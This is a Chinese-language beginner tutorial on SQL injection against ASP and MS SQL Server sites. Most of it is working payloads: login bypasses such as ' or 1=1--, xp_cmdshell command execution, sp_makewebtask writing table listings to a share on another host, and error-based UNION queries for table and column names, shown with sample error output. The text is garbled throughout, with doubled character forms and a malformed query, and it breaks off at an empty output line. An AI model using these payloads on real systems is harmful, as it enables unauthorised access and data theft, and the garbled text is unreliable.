【攻防實(shí)戰(zhàn)】SQL注入演練！

　這篇文章目的是讓初學(xué)者利用SQL注入技術(shù)來(lái)解決他們面臨的問(wèn)題, 成功的使用它們,并在這種攻擊中保護(hù)自己。

　　1.0 介紹

　　當(dāng)一臺(tái)機(jī)器只打開(kāi)了80端口, 你最依賴的漏洞掃描器也不能返回任何有用的內(nèi)容, 并且你知道管理員經(jīng)常為機(jī)器打補(bǔ)丁, 我們就不得不使用web攻擊方式了. SQL注入是web攻擊的一種類型 ,這種方式只需要開(kāi)放80端口就夠了并且即使管理員打了全部的補(bǔ)丁也能工作. 它攻擊的目標(biāo)是web程序(像asp,jsp,php,CGI等)本身而不是web服務(wù)器或系統(tǒng)上運(yùn)行的服務(wù).

　　本文不介紹任何新的東西, SQL注入已經(jīng)被廣泛的討論和使用. 我們寫這篇文章目的是因?yàn)槲覀兿胍褂肧QL注入進(jìn)行一些演練測(cè)試,希望這個(gè)能對(duì)各位有用. 你可以在這里找到一兩個(gè)竅門但是請(qǐng)你關(guān)注下"9.0 哪里有更多的信息?" 可以得到關(guān)于SQL注入更多，更深入的技術(shù).

　　1.1 什么是SQL注入?

　　通過(guò)網(wǎng)頁(yè)的輸入項(xiàng)來(lái)注入SQL查詢或命令是一種技巧。許多網(wǎng)頁(yè)會(huì)從用戶那里獲取參數(shù)，并構(gòu)建SQL查詢來(lái)訪問(wèn)數(shù)據(jù)庫(kù)。以用戶登錄為例，頁(yè)面收集用戶名和密碼然后構(gòu)建SQL去查詢數(shù)據(jù)庫(kù)，來(lái)校驗(yàn)用戶名和密碼的有效性。通過(guò)SQL注入，我們可以發(fā)送經(jīng)過(guò)精心編造的用戶名和/或密碼字段，來(lái)改變SQL查詢語(yǔ)句并賦予 我們其它一些權(quán)限。

　　1.2 你需要什么?

　　任意web瀏覽器。

　　2.0 你應(yīng)該尋找什么?

　　嘗試尋找那些允許你提交數(shù)據(jù)的頁(yè)面，即: 登錄頁(yè)面，查詢頁(yè)面，反饋信息等等。有時(shí)，HTML頁(yè)面會(huì)用POST命令來(lái)把參數(shù)發(fā)送到另外一個(gè)ASP頁(yè)面上去。那么，你可能在URL中看不到參數(shù)。不過(guò)，你可以查看頁(yè)面的HTML源代碼，查找"FORM"標(biāo)簽。你會(huì)在一些HTML源代碼中看到類似下面的東東:

　　<FORM action=Search/search.asp method=post>

　　<input type=hidden name=A value=C>

　　</FORM>

　　位于<FORM>和</FORM>之間的所有內(nèi)容都可能暗含著有用的參數(shù)(利用你的智慧)。

　　2.1 如果你找不到任何帶有輸入框的頁(yè)面怎么辦?

　　你應(yīng)該尋找諸如ASP, JSP, CGI, 或 PHP這樣的頁(yè)面。尤其要找那些攜帶有參數(shù)的 URL，比如:

　　http://duck/index.asp?id=10

　　3.0 如何測(cè)試它是否是易受攻擊的?

　　從一個(gè)單引號(hào)技巧開(kāi)始。輸入類似這樣的內(nèi)容:

　　hi' or 1=1--

　　到登錄頁(yè)面中，或者密碼中，甚至直接在URL中。例如:

　　- Login: hi' or 1=1--　

　　- Pass: hi' or 1=1--

　　- http://duck/index.asp?id=hi' or 1=1--

　　假如你必須在一個(gè)hidden字段中來(lái)這樣做，就把HTML源代碼下載下來(lái)，保存到硬盤上，修改URL和相應(yīng)的 hidden字段。例如:

　　<FORM action=http://duck/Search/search.asp method=post>

　　<input type=hidden name=A value="hi' or 1=1--">

　　</FORM>

　　如果夠幸運(yùn)，不需要任何用戶名和密碼你就可以登錄。

　　3.1 為什么是 ' or 1=1--?

　　讓我們通過(guò)另外一個(gè)例子來(lái)展示' or 1=1-- 的重要性。除了能繞過(guò)“登錄”驗(yàn)證，它還能展示一些在正常情況下很難看到的額外信息。假設(shè)，有一個(gè)ASP頁(yè)面，其功能是將我們導(dǎo)航到下面的URL：

　　http://duck/index.asp?category=food

　　在URL中，'category'是變量名；food是賦給變量的值。為了完成導(dǎo)航功能，我們猜想ASP頁(yè)面應(yīng)該包含下面的代碼（這些代碼是我們?yōu)榱送瓿纱藴y(cè)試而編寫的真實(shí)代碼）：

　　v_cat = request("category")

　　sqlstr="SELECT * FROM PRoduct WHERE PCategory='" & v_cat & "'"

　　set rs=conn.execute(sqlstr)

　　如上所示，變量v_cat獲取了參數(shù)category的值，SQL語(yǔ)句將變成：

　　SELECT * FROM product WHERE PCategory='food'

　　該SQL語(yǔ)句將返回符合where條件的的結(jié)果集。在本例中，where條件是PCategory='food'。

　　下面，假設(shè)我們將URL改成下面的形式：

　　http://duck/index.asp?category=food' or 1=1--

　　現(xiàn)在，變量v_cat等于"food' or 1=1-- "。將變量v_cat在SQL中進(jìn)行替換，我們將得到下面語(yǔ)句：

　　SELECT * FROM product WHERE PCategory='food' or 1=1--'

　　該語(yǔ)句將得到product表中所有記錄，無(wú)論P(yáng)Category是否等于'food'。“--”告訴MS SQL server忽略其后面的所有內(nèi)容（筆者注：其實(shí)可以理解為注釋，“--”后面所有的內(nèi)容都為注釋），方便我們處理單引號(hào)。在某些情況下，"--"可以被替換成”#“。

　　如果后臺(tái)的數(shù)據(jù)庫(kù)不是SQL Server，查詢語(yǔ)句的單引號(hào)就不能被忽略。在這種情況下，我們可以嘗試下面的查詢條件：

　　' or 'a'='a

　　此時(shí)，SQL語(yǔ)句將變成：

　　SELECT * FROM product WHERE PCategory='food' or 'a'='a'

　　根據(jù)真實(shí)的SQL語(yǔ)句，我們還可以嘗試以下各種變形：

　　' or 1=1--

　　" or 1=1--

　　or 1=1--

　　' or 'a'='a

　　" or "a"="a

　　') or ('a'='a

　　4.0 我如何通過(guò)SQL注入來(lái)進(jìn)行遠(yuǎn)程執(zhí)行?

　　能夠注入SQL命名通常意味著我們可以隨意執(zhí)行任何SQL查詢。默認(rèn)安裝的MS SQL 服務(wù)是作為SYSTEM來(lái)運(yùn)行的， 它相當(dāng)于 Windows系統(tǒng)中的Administrator。我們可以利用存儲(chǔ)過(guò)程，比如master..xp_cmdshell 來(lái)進(jìn)行遠(yuǎn)程執(zhí)行:

　　'; exec master..xp_cmdshell 'ping 10.10.1.2'--

　　如果單引號(hào)(')不管用，可以試試雙引號(hào) (")。

　　分號(hào)會(huì)終止當(dāng)前的SQL查詢，這就允許你開(kāi)始一個(gè)新的SQL命名。要驗(yàn)證命令是否執(zhí)行成功，你需要監(jiān)聽(tīng)來(lái)自10.10.1.2的 ICMP數(shù)據(jù)包，檢查是否收到來(lái)自服務(wù)器的數(shù)據(jù)包:

　　#tcpdump icmp

　　如果你沒(méi)有收到任何來(lái)自服務(wù)器的ping請(qǐng)求，并且收到了暗示許可錯(cuò)誤的信息，則有可能是管理員限制了Web用戶對(duì)存儲(chǔ)過(guò)程的訪問(wèn)。

　　5.0 如何獲取SQL查詢的輸出?

　　可以通過(guò)使用sp_makewebtask把你的查詢寫入到HTML:

　　'; EXEC master..sp_makewebtask "http://10.10.1.3/share/output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"

　　注意這個(gè)目標(biāo)

　　6.0 如何從數(shù)據(jù)庫(kù)的ODBC錯(cuò)誤消息中獲取數(shù)據(jù)?

　　我們幾乎可以在MS SQL服務(wù)器產(chǎn)生的錯(cuò)誤消息中得到任何我們想要的數(shù)據(jù). 通過(guò)類似下面的這個(gè)地址:

　　http://duck/index.asp?id=10

　　我們將試圖把這個(gè)整數(shù)'10'和另外的字符串進(jìn)行UNION聯(lián)合操作:

　　http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

　　系統(tǒng)表 INFORMATION_SCHEMA.TABLES 包含了服務(wù)器上所有表的信息. 這個(gè)TABLE_NAME 字段包含數(shù)據(jù)庫(kù)中每個(gè)表的字段. 這樣就不存在無(wú)此表無(wú)此字段的問(wèn)題了. 看我們的查詢語(yǔ)句:

　　SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-

　　這個(gè)語(yǔ)句將會(huì)返回?cái)?shù)據(jù)庫(kù)中第一個(gè)表的名字. 當(dāng)我們使用這個(gè)字符串值和一個(gè)數(shù)字'10'進(jìn)行UNION操作, MS SQL 服務(wù)器將會(huì)試圖轉(zhuǎn)換這個(gè)字符串(nvarchar)為一個(gè)數(shù)字. 這會(huì)產(chǎn)生一個(gè)錯(cuò)誤, 因?yàn)槲覀儾荒馨裯varchar類型轉(zhuǎn)換成數(shù)字. 服務(wù)器將會(huì)產(chǎn)生以下錯(cuò)誤信息:

　　Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

　　[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int./index.asp, line 5

　　這個(gè)錯(cuò)誤消息清楚的告訴我們這個(gè)值不能轉(zhuǎn)換為數(shù)字. 同時(shí)呢,里面也包含了數(shù)據(jù)庫(kù)中第一個(gè)表的名字 ,就是"table1".

　　想獲取下一個(gè)表的名字,我們使用下面的語(yǔ)句:

　　http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--

　　我們也可以使用LIKE關(guān)鍵詞來(lái)搜索數(shù)據(jù):

　　http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--

　　輸出:

　　Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

　　[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int./index.asp, line 5

　　這個(gè)匹配, '%25login%25' 的結(jié)果和 %login% 是一樣的在SQL Server服務(wù)器中.這樣,我們將得到 匹配的第一個(gè)表的名字, "admin_login".

　　6.1 如何挖掘到表所有列的名稱?

　　我們可以使用另一個(gè)非常有用的表INFORMATION_SCHEMA.COLUMNS 來(lái)標(biāo)出某一個(gè)的表所有列名:

　　http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--

　　輸出:

　　Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

　　[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int./index.asp, line 5

　　注意錯(cuò)誤提示,里面已經(jīng)包含了第一個(gè)列名, 下面我們使用NOT IN ()來(lái)取得下一個(gè)列的名稱:

　　http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id')--

　　輸出:

　　Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

　　[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int./index.asp, line 5

　　按上面的步驟繼續(xù)下一個(gè),我們就能獲得剩下的所有列的名稱, 即"passWord", "details"等列. 當(dāng)我們得到下面的這個(gè)錯(cuò)誤提示時(shí),就表示我們已經(jīng)找出所有的列名了.

　　http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id','login_name','password',details')--

　　輸出: